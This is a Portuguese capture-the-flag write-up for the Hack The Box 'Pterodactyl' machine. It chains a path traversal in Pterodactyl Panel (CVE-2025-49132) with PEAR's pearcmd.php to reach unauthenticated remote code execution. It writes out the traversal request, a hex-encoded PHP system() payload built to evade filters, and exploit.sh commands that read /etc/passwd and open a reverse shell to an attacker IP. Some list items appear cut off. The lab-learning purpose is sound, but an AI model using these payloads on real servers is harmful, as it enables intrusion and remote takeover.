
Exploração de RCE não autenticada para o Pterodactyl Panel (CVE-2025-49132) combinando path traversal com injeção de comando PEAR para executar código PHP arbitrário em servidores vulneráveis.
HTB Temporada 10 - Writeup da Máquina Pterodactyl
Alvo: Máquina Pterodactyl HTB (Dificuldade Média)
CVE: CVE-2025-49132
Severidade: Crítica (CVSS 9.8)
Tipo de Ataque: Execução Remota de Código sem Autenticação
Afetados: Pterodactyl Panel < v1.11.11
Esta cadeia de exploração combina:
O endpoint /locales/locale.json do Pterodactyl Panel permite path traversal através do parâmetro locale:
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd
Isso pode ser encadeado com pearcmd.php do PEAR para:
/tmpPEAR (Repositório de Extensões e Aplicações PHP) possui uma ferramenta CLI (pearcmd.php) que:
config-create que escreve arquivosA Cadeia de Exploração:
Path Traversal → Carregar pearcmd.php → Injetar PHP via config-create → Executar PHP malicioso
Comandos são codificados em hexadecimal usando hex2bin() para contornar:
Exemplo:
Command: whoami
Hex: 77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>
Método: Usando o exploit.sh fornecido
chmod +x exploit.sh
# Get user flag
./exploit.sh flag
# Execute commands
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"
# Reverse shell
nc -lvnp 4444 # On attacker machine
./exploit.sh shell 10.10.14.21 4444